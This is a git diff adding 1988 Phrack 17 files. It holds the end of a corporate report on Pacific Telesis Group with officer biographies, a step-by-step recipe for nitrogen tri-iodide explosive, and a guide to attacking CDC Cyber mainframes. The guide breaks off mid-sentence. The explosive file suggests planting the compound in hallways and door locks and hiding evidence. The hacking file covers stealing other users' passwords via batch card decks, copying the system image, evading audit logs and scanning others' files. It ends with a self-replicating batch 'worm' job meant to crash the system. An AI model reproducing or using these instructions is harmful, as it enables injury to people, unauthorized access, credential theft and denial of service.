+           BACKGROUND: This business was founded in 1906 as a California
+      Corporation. The Pacific Telephone & Telegraph Company formed Dec 31
+      1906. Majority of the stock was held by American Telephone & Telegraph
+      Co (A T & T), New York, NY, prior to divestiture.
+           DIVESTITURE: Pursuant to a court oder of the U S District Court for
+      the Distirict of Columbia, A T & T divested itself of the exchange,
+      telecommunications, exchange access and printing directory advertising
+      portions of its 22 wholly-owned subsidiary operating telephone
+      companies, including the Pacific Telephone & Telegraph Company. A T & T
+      retains ownership of the former A T & T long lines interstate
+      organization, as well as those portions of the subsidiaries that provide
+      interchange services and customer premises equipment. To accomplish the
+      divestiture, this regional holding company was formed, which took over
+      the applicable operations and assets of the Pacific Telephone &
+      Telegraph Company and its subsidiary, Bell Telephone Company of Nevada.
+      Stock in the subject was distributed to the shareholders of A T & T, who
+      also retained their existing A T & T Stock. The divestiture was
+      accomplished on Jan 1 1984.
+           RECENT EVENTS:During Jun 1986, the company completed the
+      acquisition of Communications Industries Inc, Dallas, TX.
+           In Dec 1986, the company's wholly-owned subsidiary Pac Tel Cellular
+      Inc of Michigan signed an agreement to purhcase five cellular telephone
+      properties for $316 million plus certain contingent payments. These five
+      systems operate under the name of Cellular One. This acquaition is
+      subject to regulatory and court approval and final legal review.
+           ------------------------OFFICERS------------------------.
+           GUINN born 1932 married. 1954 received BSCE from Oregon State
+      University. 1954-60 with The Pacific Telephone & Telegraph Company, San
+      Francisco, CA. 1960-64 with Pacific Northwest Bell Telephone Co,
+      Seattle, WA, as vice president. 1964-70 with A T & T. 1970-76 with
+      Pacific Northwest Bell. 1976-80 with A T & T as vice president-network
+      service. 1980 chairman and chief executive officer of The Pacific
+      Telephone & Telegraph Company. 1984 with Pacific Telesis Group as
+      chairman, president and chief executive officer.
+           SAENGER born 1928 married. 1951 received BS from the University of
+      California. 1946-47 in the U S Army. 1951-52 secretary and manager for
+      the Oakland Junior Chamber of Commerce. 1950-70 held various positions
+      with The Pacific Telephone & Telegraph Company. 1970-71 traffic
+      operations director for Network Administration in New York, A T & T.
+      1971 with The Pacific Telephone & Telegraph Company. 1974 vice
+      president. 1977 president. 1984 with Pacific Telesis Group as vice
+      chairman and president, Pacific Bell.
+           GINN born 1937 married. 1959 graduated from Auburn University. 1969
+      received MS from Stanford University. 1959-60 in the U S Army Signal
+      Corps as captain. 1960 joined A T & T Long Lines. 1977 vice
+      president-staff for A T & T Long Lines. 1978 joined The Pacific
+      Telephone & Telegraph Company as executive vice president-network. 1983
+      vice chairman. 1984 with Pacific Telesis Group as vice chairman and
+      group president, PacTel Companies.
+           HULSE  born 1933 married. 1955 received BS from the University of
+      South Dakota. 1956-58 in the U S Army. 1958 joined Northwestern Bell
+      Telephone Co. 1980 joined The Pacific Telephone & Telegraph Company as
+      executive vice president and chief financial officer. 1983 vice
+      chairman. 1984 with Pacific Telesis Group as vice chairman and chief
+      financial officer.
+           LATNO  born 1929 married. Received BS degree from the University of
+      Santa Clara. 1952 with Pacific Telephone & Telegraph Co. 1972 vice
+      president-regulatory. 1975 executive vice president-external affairs.
+      1984 with Pacific Telesis Group as executive vice president-external
+      affairs.
+           DALENBERG born 1930 married. Graduated from the University of
+      Chicago Law School and Graduate School of Business. 1956 admitted to
+      practice at the Illinois Bar and in 1973 the California Bar. 1957-67
+      private law practice in Chicago, IL. 1967-72 general attorney for
+      Illinois Bell. 1972-75 general attorney for The Pacific Telephone &
+      Telegraph Company. 1975 associate general counsel. 1976 vice president
+      and secretary-general counsel. 1984 with Pacific Telesis Group as
+      executive vice president and general counsel-secretary.
+           CROSS. Vice President and Treasurer and also Vice President of
+      Pacific Bell.
+           DIAL  born 1929 married. 1951 received BA from Whittier College.
+      1961 received MS from California State University. 1951-53 in the U S
+      Army. 1954 with The Pacific Telephone & Telegraph Company. 1973 vice
+      president-regional staff and operations service for Southern California.
+      1976 vice president-customer operations in Los Angeles, CA. 1977 vice
+      president-corporate planning. 1980 vice president-human resources. 1984
+      with Pacific Telesis Group as executive vice president-human resources.
+           SPILLER born 1931 married. 1953 received BS from the University of
+      California, San Francisco. 1954-56 in the U S Army as a second
+      lieutenant. 1953 with The Pacific Telephone & Telegraph Company. 1977
+      assistant comptroller. 1981 assistant vice president-finance management.
+      1981 vice president and comptroller. 1984 with Pacific Telesis Group as
+      vice president and comptroller.
+           ---------------------OTHER DIRECTORS---------------------.
+           BARKER. Retired chairman of First Interstate Bank Ltd.
+           CLARK. Of counsel to the law firm of Rogers & Wells.
+           COBLENTZ. Senior Partner in Coblentz, Cahen, Mc Cabe & Breyer,
+      Attorneys, San Francisco, CA.
+           DU BAIN. Chairman of SRI International.
+           GALLEGOS. Management consultant.
+           HARVEY. Chairman, and chief executive officer of Transamerica
+      Corporation, San Francisco, CA.
+           HOUSTON. Chairman and chief executive officer of Golden State
+      Mutual Life Insurance Co.
+           LUTTGENS. Is a community leader.
+           MC NEELY. Chairman and chief executive officer of Oak Industries,
+      Inc, San Diego, CA.
+           RITCHEY. Retired Chairman of Lucky Stores Inc.
+           SMITH. Partner in Gibson, Dunn & Crutcher, Attorneys.
+           METZ.  President of Mills College.
+
+      OPERATION
+      09/01/87
+
+           Pacific Telesis Group is a regional holding company whose
+      operations are conducted by subsidiaries.
+           The company's two major subsidiaries, Pacific Bell and Nevada Bell,
+      provide a wide variety of communications services in California and
+      Nevada, including local exchange and toll service, network access and
+      directory advertising, and provided over 90% of total 1986 revenues.
+           Other  subsidiaries, as noted below, are engaged in directory
+      publishing, cellular mobile communications and services, wholesaling of
+      telecommunications products, integrated systems and other services,
+      retails communications equipment and supplies, financing services for
+      products of affiliated customers, real estate development, and
+      consulting. Specific percentages of these operations are not available
+      but in the aggregate represent approximately 10%.
+           Terms are net 30 days. Has over 11,000,000 accounts. Sells to the
+      general public and commercial concerns. Territory :Worldwide.
+           EMPLOYEES: 74,937 including officers. 2,000 employed here.
+      Employees are on a consolidated basis as of Dec 31 1986.
+           FACILITIES: Owns over 500,000 sq. ft. in 20 story concrete and
+      steel building in good condition. Premises neat.
+           LOCATION: Central business section on side street.
+           BRANCHES: The subject maintains minor additional administrative
+      offices in San Francisco, CA, but most operating branches are conducted
+      by the operating subsidiaries, primarily Pacific Bell and Nevada Bell in
+      their respective states.
+           SUBSIDIARIES: Subsidiaries: The Company has the following principal
+      operating subsidiaries, all wholly-owned either directly or indirectly.
+      The telephone subsidiaries account for over 90% of the operating
+      results.
+           (1)  Pacific Bell (Inc) San Francisco CA. Formed 1906 as a
+      California corporation. Acquired in 1984 as part of the divestiture of
+      AT&T. It is the company's largest subsidiary . It provides
+      telecommunicaton services within its service area in California.
+           (2)  Nevada Bell (Inc) Reno NV. Incorporated in 1913. acquired from
+      Pacific Bell in 1984 by the divestiture of its stock. Provides
+      telecommunications, services in Nevada.
+           (3)   Pac Tel Cellular Inc, TX. Renamed subsidiary formerly known
+      as Comminications Industries Inc. Acquired in 1986. Operates as a
+      marketer of cellular and paging services. This subsidiary, in turn, has
+      several primary subsidiaries as follows:.
+           (a) Gen Com Incorporated. Provides personal paging services.
+           (b) Multicom Incorporated. Markets paging services.
+           (4) Pac Tel Personal Communications. Formed to eventually hold all
+      of the company's cellular and paging operations. It is the parent of the
+      following:.
+           (c)   Pac Tel Cellular supports the company's cellular activities.
+           (d)  Pac Tel Mobile Services-formed to rent and sell cellular CPE
+      and paging equipment and resell cellular services, is now largely
+      inactive.
+           (5) Pac Tel Corporation, San Francisco CA began operations in Jan
+      1986 as a direct holding company subsidiary. It owns the stock of the
+      following companies:.
+           (e) Pac Tel Communications Companies-operates two primary
+      divisions, Pac Tel Info Systems and Pac Tel Spectrum Services.
+           (f) Pac Tel Finance-provides lease financing services.
+           (g)  Pac Tel Properties-engages in real estate transactions holding
+      real estate valued at approximately $140 million at Dec 31 1986.
+           (h) Pac Tel Publishing -inactive at present.
+           (i)  Pacific Telesis International-manages and operates
+      telecommunicatin businesses in Great Britain, Japan, South Korea, Spain
+      and Thailand.
+           (6) Pac Tel Capital Resources, San Francisco, CA -provides funding
+      through the sale of debt securities.
+           INTERCOMPANY RELATIONS: Includes common management, intercompany
+      services, inventory and equipment transactions, loans and advances. In
+      addition, the debt of Pac Tel Capital Resources is backed by a support
+      agreement from the parent with the debt unconditionally guaranteed for
+      repayment without recourse to the stock or assets of the telephone
+      subsidiaries or any interest therein.
+      08-27(1Z2   /27)         29709                    052678678   H
+      ANALYST: Dan Quinn
+
+      12/31/86 COMBINATION FISCAL
+      (Figures are in THOUSANDS)
+
+      FINANCIALS                                        %     COMPANY    INDST
+                                           COMPANY    CHANGE     %      NORM %
+      Total Current Assets. . . . .     2,156,300       9.3     10.6     22.0
+      Fixed Assets. . . . . . . . .    17,244,900       1.6     84.9     35.6
+      Other Non-current Assets. . .       919,300      53.8      4.5     42.4
+      Total Assets. . . . . . . . .    20,320,500       4.0    100.0    100.0
+      Total Current Liabilities . .     2,405,100      21.3     11.8     11.6
+      Other Long Term Liab. . . . .     5,564,600      (7.6)    27.4     46.8
+      Net Worth . . . . . . . . . .     7,753,300       6.0     38.2     35.2
+      Total Liabilities & Worth. .     20,320,500       4.0    100.0    100.0
+      Net Sales . . . . . . . . . .     8,977,300       5.6    100.0    100.0
+      Gross Profit. . . . . . . . .          ----      ----     ----     40.1
+
+
+      RATIOS                                     %    ---INDUSTRY QUARTILES---
+                                      COMPANY  CHANGE   UPPER  MEDIAN   LOWER
+      Quick Ratio . . . . . . . . .      0.7    ----      2.9     1.2     0.6
+      Current Ratio . . . . . . . .      0.9   (10.0)     4.9     2.2     1.0
+      Total Liab to Net Worth (%) .    162.1    (2.9)   127.4   180.2   297.2
+      Sales to Inventory. . . . . .     77.2    10.6     56.2    33.8    20.0
+      Return on Sales (%) . . . . .     12.0    10.1     20.1    14.6    11.3
+      Return on Assets (%). . . . .      5.3    10.4      7.2     5.7     3.7
+      Return on Net Worth (%) . . .     13.9     9.4     19.0    15.9    12.8
+
+          Industry norms based on 469  firms,
+          with assets over $5 million.
diff --git a/phrack17/4.txt b/phrack17/4.txt
new file mode 100644
index 0000000..b9fad42
--- /dev/null
+++ b/phrack17/4.txt
@@ -0,0 +1,174 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                 File 4 of 12 : Nitrogen-Trioxide Explosives
+
+
+------------------------------------------------------------------------------
+Working notes on Nitrogen Tri-Iodide (NI-3)
+
+By: Signal Sustain
+
+
+
+INTRODUCTION
+
+This particular explosive is a real loser.  It is incredibly unstable,
+dangerous to make, dangerous to work with, and you can't do much with it,
+either.  A string of Black Cats is worth far more.  At least you can blow up
+anthills with those.
+
+NI-3 is basically a compound you can make easily by mixing up iodine crystals
+and ammonia.  The resulting precipitate is very powerful and very unstable.
+It is semi stable when wet (nothing you want to trust) and absolutely unstable
+when dry.  When dry, anything will set it off, such as vibration, wind, sun, a
+fly landing on it.  It has to be one of the most unstable explosives you can
+deal with.
+
+But it's easy to make.  Anyone can walk into a chem supply house, and get a
+bottle of iodine, and and a supermarket, and get clear ammonia.  Mix them and
+you're there.  (See below for more on this)
+
+So, some of you are going to try it, so I might as well pass on some tips from
+hard experience.  (I learned it was a loser by trying it).
+
+
+Use Small Batches
+
+
+First, make one very small batch first.  Once you learn how powerful this
+stuff is, you'll see why.  If you're mixing iodine crystals (that's right,
+crystals, iodine is a metal, a halogen, and its solid form is crystals; the
+junk they sell as "iodine" in the grocery store is about 3% iodine in a bunch
+of solvents, and doesn't work for this application), you want maybe 1/4
+teaspoonful MAX, even less maybe.  1/4 TSP of this stuff is one hellacious
+bang; it rattled the windows for a block around when it went off in my back
+yard.
+
+So go with 1/4 TSP, if I can talk you into it.  The reason is the instability
+of this compound.  If you mix up two teaspoonfuls and it goes off in your
+hand, kiss your hand goodbye right down to the wrist.  A bucketful would
+probably level any house you'll find.  But 1/4 teaspoon, you might keep your
+fingers.  Since I know you're not going to mix this stuff up with remote
+tools, keep the quantities small.  This stuff is so unstable it's best to
+hedge your bets.
+
+Note:  When holding NI3, try to hold with remote tools -- forceps?  But if you
+have to pick it up, fold your thumb next to your first finger, and grip around
+with your fingers only.  Do not grip the flask the conventional way, fingers
+on one side, thumb of the other.  This way, if it goes, you may still have an
+opposing thumb, which is enough to get by with.
+
+The compound is far more stable when wet, but not certain-stable.  That's why
+companies that make explosives won't use it; even a small chance of it blowing
+up is too dangerous.  (They still lose dynamite plants every now and then,
+too, which is why they're fully automated).  But when this stuff gets dry,
+look out.  Heinlein says "A harsh look will set it off", and he isn't kidding.
+Wind, vibration, a breath across it, anything will trigger it off.  (By the
+way, Heinlein's process, from  SF book "Farnham's Freehold", doesn't work,
+either -- you can't use iodine liquid for this.  You must use iodine
+crystals.)
+
+Don't Store It
+
+What's so wickedly dangerous is if you try to store the stuff.  Say you put it
+in a cup.  After a day, a crust forms around the rim of the liquid, and it
+dries out.  You pick up the cup, kabang!, the crust goes off, and the liquid
+goes up from the shock.  Your fingers sail into your neighbor's lawn.  If you
+make this, take extreme pains to keep it all wet.  At least stopper the
+testtube, so it can't evaporate.
+
+
+Making It
+
+Still want to make it?  Okay.  Get some iodine crystals at a chem supply
+store.  If they ask, say you need to purify water for a camping trip, and
+they'll lecture you on better alternatives (halazone) but you can still get
+it.  Or, tell them you've been elected to play Mr. Wizard, and be honest --
+you'll probably get it too.  Possession is not illegal.
+
+Get as little as possible.  You need little and it's useless once you've tried
+it once.  Aim for 1/4 teaspoonful.
+
+Second, get some CLEAR, NON SUDSY ammonia at the store, like for cleaning
+purposes (BUT NO SUDS!  They screw things up, it doesn't make the NI-3).
+
+Third, pour ammonia in a bowl.  Peeew!  Nice smell.
+
+Fourth, add 1/4 TSP or less of iodine crystals.  Note these crystals, which
+looks like instant coffee, will attack other metals, so look out for your
+tableware.  Use plastic everything (Bowl, spoon) if you can.  These crystals
+will also leave long-standing iodine stains on hands, and that's damned
+incriminating if there was just an NI-3 explosion and they're looking for who
+did it.  Rubber gloves, please, dispose after use.
+
+Now the crystals will sort of spread out.  Stir a little if need be.  Be
+damned careful not to leave solution on the spoon that might dry.  It'll go
+off if you do, believe me.  (Experience).
+
+Let them spread out and fizzz.  They will.  Then after an hour or so there
+will be left some reddish-brown glop in the bottom of the clear ammonia.  It's
+sticky like mud, hard to handle..  That's the NI-3.
+
+It is safe right now, as it is wet.  (DO NOT LET A RIM FORM ON THE AMMONIA
+LIQUID!)
+
+
+
+Using It
+
+Now let's use up this junk right away and DON'T try to store it.
+
+Go put it outside someplace safe.  In my high school, someone once sprinkled
+tiny, tiny bits (like individual crystals) in a hallway.  Works good, it's
+like setting off a cap under someone's shoe after the stuff dries.  You need
+far less than 1/4 TSP for this, too.
+
+Spread it out in the sun, let it dry.  DO NOT DISTURB.  If you hear a sudden
+CRACK!, why, it means the wind just blew enough to set it off, or maybe it
+just went off by itself.  It does that too.
+
+It must be thoroughly dry to reach max instability where a harsh look sets it
+off.  Of course the top crystals dry first, so heads up.  Any sharp impact
+will set it off, wet or dry.
+
+While you're waiting for it to dry, go BURN the plastic cup and spoon you made
+it with.  You'll hear small snapping noises as you do; this is the solution
+drying and going off in the flames.
+
+After two hours or so, toss rocks at the NI3 from a long ways away, and you'll
+see it go off.  Purplish fumes follow each explosion.  It's a sharp CRACK, you
+can't miss it.
+
+Anyway.  Like I say, most people make this because the ingredients are so
+easily available.  They make it, say what the hell do I do now?, and sprinkle
+tiny crystals in the hallway.  Bang bang bang.  And they never make it again,
+because you only get one set of fingers per hand, and most people want to keep
+them.
+
+Or they put it in door locks (while still in the "sludge" form), and wait for
+it to try.  Next person who sticks a key in there has a big surprise.
+
+(This is also why most high school chem teachers lock up the iodine crystals.)
+
+Getting Rid Of It
+
+If you wash the NI-3 crystals down your kitchen sink, then you have to only
+wait for them to dry out and go off.  They'll stick to the pipe (halogen
+property, there).  I heard a set of pipes pop and crackle for days after this
+was done.  I'd recommend going and throwing the mess into a vacant lots or
+something, and trying to set it off so no one else does accidentally.
+
+If you do this, good luck, and you've been warned.
+
+
+-- Signal Sustain
+
+
+------------------------------------------------------------------------------
diff --git a/phrack17/5.txt b/phrack17/5.txt
new file mode 100644
index 0000000..fdf86b2
--- /dev/null
+++ b/phrack17/5.txt
@@ -0,0 +1,514 @@
+                        % = % = % = % = % = % = % = %
+                        =                           =
+                        %   P h r a c k   X V I I   %
+                        =                           =
+                        % = % = % = % = % = % = % = %
+
+                              Phrack  Seventeen
+                                07 April 1988
+
+                   File 5 of 12 : How to Hack Cyber Systems
+
+
+
+How To Hack A CDC Cyber
+
+By: ** Grey Sorcerer
+
+
+Index:
+
+1. General Hacking Tips
+2. Fun with the card punch
+3. Getting a new user number the easy way
+4. Hacking with Telex and the CDC's batch design
+5. Grabbing a copy of the whole System
+6. Staying Rolled In with BREAK
+7. Macro Library
+8. RJE Status Checks
+9. The Worm
+10. The Checkpoint/Restart Method to a Better Validation
+
+
+I'm going to go ahead and skip all the stuff that's in your CDC reference
+manuals.. what's a local file and all that.  If you're at the point of being
+ready to hack the system, you know all that; if not, you'll have to get up to
+speed on it before a lot of this will make sense.  Seems to me too many "how
+to hack" files are just short rewrites of the user manuals (which you should
+get for any serious penetration attempt anyway, or you'll miss lots of
+possibilities), without any tips on ways to hack the system.
+
+
+General hacking tips:
+
+
+Don't get caught.  Use remote dialups if possible and never never use any user
+number you could be associated with.  Also never re-use a user number.
+Remember your typical Cyber site has a zillion user numbers, and they can't
+watch every one.  Hide in numbers.  And anytime things get "hot", lay off for
+awhile.
+
+Magtapes are great.  They hold about 60 Meg, a pile of data, and can hold even
+more with the new drives.  You can hide a lot of stuff here offline, like
+dumps of the system, etc., to peruse.  Buy a few top quality ones..  I like
+Black Watch tapes my site sells to me the most, and put some innocuous crap on
+the first few records..  data or a class program or whatever, then get to the
+good stuff.  That way you'll pass a cursory check.  Remember a usual site has
+THOUSANDS of tapes and cannot possibly be scanning every one; they haven't
+time.
+
+One thing about the Cybers -- they keep this audit trail called a "port log"
+on all PPU and CPU accesses.  Normally, it's not looked at.  But just remember
+that *everything* you do is being recorded if someone has the brains and the
+determination (which ultimately is from you) to look for it.  So don't do
+something stupid like doing real work on your user number, log off, log right
+onto another, and dump the system.  They WILL know.
+
+Leave No Tracks.
+
+Also remember the first rule of bragging:  Your Friends Turn You In.
+
+And the second rule:  If everyone learns the trick to increasing priority,
+you'll all be back on the same level again, won't you?  And if you show just
+two friends, count on this:  they'll both show two friends, who will show
+four...
+
+So enjoy the joke yourself and keep it that way.
+
+
+Fun With The Card Punch
+
+
+Yes, incredibly, CDC sites still use punch cards.  This is well in keeping
+with CDC's overall approach to life ("It's the 1960's").
+
+The first thing to do is empty the card punch's punchbin of all the little
+punchlets, and throw them in someone's hair some rowdy night.  I guarantee the
+little suckers will stay in their hair for six months, they are impossible to
+get out.  Static or something makes them cling like lice.  Showers don't even
+work.
+
+The next thing to do is watch how your local installation handles punch card
+decks.  Generally it works like this.  The operators love punchcard jobs
+because they can give them ultra-low priority, and make the poor saps who use
+them wait while the ops run their poster-maker or Star Trek job at high
+priority.  So usually you feed in your punchcard deck, go to the printout
+room, and a year later, out comes your printout.
+
+Also, a lot of people generally get their decks fed in at once at the card
+reader.
+
+If you can, punch a card that's completely spaghetti -- all holes punched.
+This has also been known to crash the cardreader PPU and down the system.  Ha,
+ha.  It is also almost certain to jam the reader.  If you want to watch an
+operator on his back trying to pick pieces of card out of the reader with
+tweezers, here's your chance.
+
+Next, the structure of a card deck job gives lots of possibilities for fun.
+Generally it looks like this:
+
+  JOB card:  the job name (first 4 characters)
+  User Card:  Some user number and  password -- varies with site
+EOR card: 7-8-9 are punched
+  Your Batch job (typically, Compile This Fortran Program).  You know, FTN.
+  LGO.  (means, run the Compiled Program)
+EOR card: 7-8-9 are punched
+  The Fortran program source code
+EOR card: 7-8-9 are punched
+  The Data for your Fortran program
+EOF card: 6-7-8-9 are punched.  This indicates:  (end of deck)
+
+This is extremely typical for your beginning Fortran class.
+
+In a usual mainframe site, the punchdecks accumulate in a bin at the operator
+desk.  Then, whenever he gets to it, the card reader operator takes about
+fifty punchdecks, gathers them all together end to end, and runs them through.
+Then he puts them back in the bin and goes back to his Penthouse.
+
+
+GETTING A NEW USER NUMBER THE EASY WAY
+
+
+Try this for laughs:  make your Batch job into:
+
+  JOB card:  the job name (first 4 characters)
+  User Card:  Some user number and  password -- varies with site
+  EOR card:  7-8-9 are punched
+  COPYEI INPUT,filename:  This copies everything following the EOR mark to the
+                          filename in this account.
+  EOR Card:  7-8-9 are punched.
+
+Then DO NOT put an EOF card at the end of your job.
+
+Big surprise for the job following yours:  his entire punch deck, with, of
+course, his user number and password, will be copied to your account.  This is
+because the last card in YOUR deck is the end-of-record, which indicates the
+program's data is coming next, and that's the next person's punch deck, all
+the way up to -his- EOF card.  The COPYEI will make sure to skip those pesky
+record marks, too.
+
+I think you can imagine the rest, it ain't hard.
+
+
+Hacking With Telex
+
+When CDC added timeshare to the punch-card batch-job designed Cyber machines,
+they made two types of access to the system:  Batch and Telex.  Batch is a
+punch-card deck, typically, and is run whenever the operator feels like it.
+Inside the system, it is given ultra low priority and is squeezed in whenever.
+It's a "batch" of things to do, with a start and end.
+
+Telex is another matter.  It's the timeshare system, and supports up to, oh,
+60 terminals.  Depends on the system; the more RAM, the more swapping area (if
+you're lucky enough to have that), the more terminals can be supported before
+the whole system becomes slug-like.
+
+Telex is handled as a weird "batch" file where the system doesn't know how
+much it'll have to do, or where it'll end, but executes commands as you type
+them in.  A real kludge.
+
+Because the people running on a CRT expect some sort of response, they're
+given higher priority.  This leads to "Telex thrashing" on heavily loaded CDC
+systems; only the Telex users get anywhere, and they sit and fight over the
+machine's resources.
+
+The poor dorks with the punch card decks never get into the machine, because
+all the Telex users are getting the priority and the CPU.  (So DON'T use punch
+cards.)
+
+Another good tip:  if you are REQUIRED to use punch cards, then go type in
+your program on a CRT, and drop it to the automatic punch.  Sure saves trying
+to correct those typos on cards..
+
+When you're running under Telex, you're part of one of several "jobs" inside
+the system.  Generally there's "TELEX," something to run the line printer,
+something to run the card reader, the mag tape drivers (named "MAGNET") and
+maybe a few others floating around.  There's limited space inside a Cyber..
+would you believe 128K 60-bit words?..  so there's a limited number of jobs
+that can fit.  CDC put all their effort into "job scheduling" to make the best
+of what they had.
+
+You can issue a status command to see all jobs running; it's educational.
+
+Anyway, the CDC machines were originally designed to run card jobs with lots
+of magtape access.  You know, like IRS stuff.  So they never thought a job
+could "interrupt," like pressing BREAK on a CRT, because card jobs can't.
+This gives great possibilities.
+
+Like:
+
+Grabbing a Copy Of The System
+
+For instance.  Go into BATCH mode from Telex,  and do a Fortran compile.
+While in that, press BREAK.  You'll get a "Continue?" verification prompt.
+Say no, you'd like to stop.
+
+Now go list your local files.  Whups, there's a new BIG one there.  In fact,
+it's a copy of the ENTIRE system you're running on -- PPU code, CPU code, ALL
+compilers, the whole shebang!  Go examine this local file; you'll see the
+whole bloody works there, mate, ready to play with.
+
+Of course, you're set up to drop this to tape or disk at your leisure, right?
+
+This works because the people at CDC never thought that a Fortran compile
+could be interrupted, because they always thought it would be running off
+cards.  So they left the System local to the job until the compile was done.
+Interrupt the compile, it stays local.
+
+Warning:  When you do ANYTHING a copy of your current batch process shows up
+on the operator console.  Typically the operators are reading Penthouse and
+don't care, and anyway the display flickers by so fast it's hard to see.  But
+if you copy the whole system, it takes awhile, and they get a blow-by-blow
+description of what's being copied.  ("Hey, why is this %^&$^ on terminal 29
+copying the PPU code?") I got nailed once this way; I played dumb and they let
+me go.  ("I thought it was a data file from my program").
+
+
+Staying "Rolled In"
+
+When the people at CDC designed the job scheduler, they made several "queues."
+"Queues" are lines.
+
+There's:
+
+1. Input Queue.  Your job hasn't even gotten in yet.  It is standing outside,
+                 on disk, waiting.
+2. Executing Queue.  Your job is currently memory resident and is being
+                 executed, although other jobs currently in memory are
+                 competing for the machine as well.  At least you're in
+                 memory.
+3. Timed/Event Rollout Queue:  Your job is waiting for something, usually a
+                 magtape.  Can also be waiting for a given time.  Yes, this
+                 means you can put a delayed effect job into the system.  Ha,
+                 ha.  You are on disk at this point.
+4. Rollout Queue:  Your job is waiting its turn to execute.  You're out on
+                 disk right now doing nothing.
+
+Anyway, let's say you've got a big Pascal compile.  First, ALWAYS RUN FROM
+TELEX (means, off a CRT).  Never use cards.  If you use cards you're
+automatically going to be low man on the priority schedule, because the CPU
+doesn't *have* to get back to you soon.  Who of us has time to waste?
+
+Okay, do the compile.  Then do a STATUS on your job from another machine.
+Typically you'll be left inside the CPU (EXECUTE) for 10 seconds, where you'll
+share the actual CPU with about 10-16 other jobs.  Then you'll be rolled-out
+(ROLLOUT), at which time you're phucked; you have to wait for your priority to
+climb back up before it'll execute some more of your job.  This can take
+several minutes on a deeply loaded system.
+
+(All jobs have a given priority level, which usually increments every 10 sec
+or so, until they start executing).
+
+Okay, do this.  Press BREAK, then at the "Continue?" prompt, say yes.  What
+happened?  Telex had to "roll your job in" to process the BREAK!  So you get
+another free 10 seconds of CPU -- which can get a lot done.
+
+If you sit and hit BREAK - Y <return> every 10 sec or so during a really big
+job, you will just fly through it.  Of course, everyone else will be sitting
+and staring at their screen, doing nothing, because you've got the computer.
+
+If you're at a school with a Cyber, this is how to get your homework done at
+high speed.
+
+
+Macro Library
+
+If you have a typical CDC site, they won't give you access to the "Macro
+library."  This is a set of CPU calls to do various things -- open files, do
+directory commands, and whatnot.  They will be too terrified of "some hacker."
+Reality:  The dimbulbs in power don't want to give up ANY of their power to
+ANYONE.  You can't really do that much more with the Macro library, which
+gives assembly language access to the computer, than you can with batch
+commands..  except what you do leaves lots less tracks.  They REALLY have to
+dig to find out what your program did if you use Macro calls..  they have to
+go to PPU port logs, which is needle in a haystack sort of stuff, vs. batch
+file logs, which are real obvious.
+
+Worry not.  Find someone at Arizona State or Minnesota U. that's cool, and get
+them to send you a tape of the libraries.  You'll get all the code you can
+stand to look at.  By the way they have a great poster tape...  just copy the
+posters to the line printer.  Takes a long time to print them but it's worth
+it.  (They have all the classic ones..  man on the moon, various playmates,
+Spock, etc.  Some are 7 frames wide!).
+
+With the Macro library, you can do many cool things.
+
+The best is a demon scanner.  All CDC user numbers have controlled access for
+other users to individual files -- either private, (no access to anyone else),
+semiprivate (others can read it but a record is made), or public (anyone can
+diddle your files, no record).  What you want is a program (fairly easy to do
+in Fortran) that counts through user numbers, doing directory commands.  If it
+finds anything, it checks for non semi-private (so no records are made), then
+copies it to you.
+
+You'll find the damnedest stuff, I guarantee it.  Try to watch some system
+type signing in and get the digits of his user number, then scan variations
+beginning with that user #.  For instance, if he's a SYS1234, then scan all
+user #'s beginning with SYS (sysaaaa to sys9999).
+
+Since it's all inside the Fortran program, the only record, other than
+hard-to-examine PPU logs, is a "Run Fortran Program" ("LGO.") on the batch
+dayfile.  If you're not giving the overworked system people reason to suspect
+that commonplace, every-day student Fortran compile is anything out of the
+ordinary, they will never bother to check -- the amount of data in PPU logs is
+OVERWHELMING.
+
+But you can get great stuff.
+
+There's a whole cool library of Fortran-callable routines to do damned near
+anything a batch command could do in the Minnesota library.  Time to get some
+Minnesota friends -- like on UseNet.  They're real cooperative about sending
+out tapes, etc.
+
+Generally you'll find old files that some System Type  made public one day (so
+a buddy could copy them) then forgot about.  I picked off all sorts of stuff
+like this.  What's great is I just claimed my Fortran programs were hanging
+into infinite loops -- this explained the multi-second CPU execution times.
+Since there wasn't any readily available record of what I was up to, they
+believed it.  Besides, how many idiot users really DO hang into loops?  Lots.
+Hide in numbers.  I got Chess 4.2 this way -- a championship Chess program --
+and lots of other stuff.  The whole games library, for instance, which was
+blocked from access to mere users but not to sysfolk.
+
+Again, they *can* track this down if you make yourself obnoxious (it's going
+to be pretty obvious what you're doing if there's a CAT: SYSAAAA
+CAT: SYSAAAB  CAT: SYSAAAC .. etc. on your PPU port log) so do this on someone
+else's user number.
+
+
+RJE Status Checks
+
+Lots of stupid CDC installations..  well, that doesn't narrow the field much..
+have Remote Job Entry stations.  Generally at universities they let some poor
+student run these at low pay.
+
+What's funny is these RJE's can do a status on the jobs in the system, and the
+system screeches to a halt while the status is performed.  It gets top
+priority.
+
+So, if you want to incite a little rebellion, just sit at your RJE and do
+status requests over and over.  The system will be even slower than usual.
+
+
+The Worm
+
+Warning:  This is pretty drastic.  It goes past mere self-defense in getting
+enough priority to get your homework done, or a little harmless exploration
+inside your system, to trying to drop the whole shebang.
+
+It works, too.
+
+
+You can submit batch jobs to the system, just as if you'd run them through the
+punchcard reader, using the SUBMIT command.  You set up a data file, then do
+SUBMIT datafile.  It runs separate from you.
+
+Now, let's say we set up a datafile named WORM.  It's a batch file.  It looks
+like this:
+
+JOB
+USER,blah (whatever -- a user number you want crucified)
+GET,WORM; get a copy of WORM
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+SUBMIT,WORM.; send it to system
+  (16 times)
+(end of file)
+
+Now, you SUBMIT WORM.  What happens?  Worm makes 16 copies of itself and
+submits those.  Those in turn make 16 copies of themselves (now we're up to
+256) and submit those.  Next pass is 4096.  Then 65536.  Then...
+
+Now, if you're really good, you'll put on your "job card" a request for high
+priority.  How?  Tell the system you need very little memory and very little
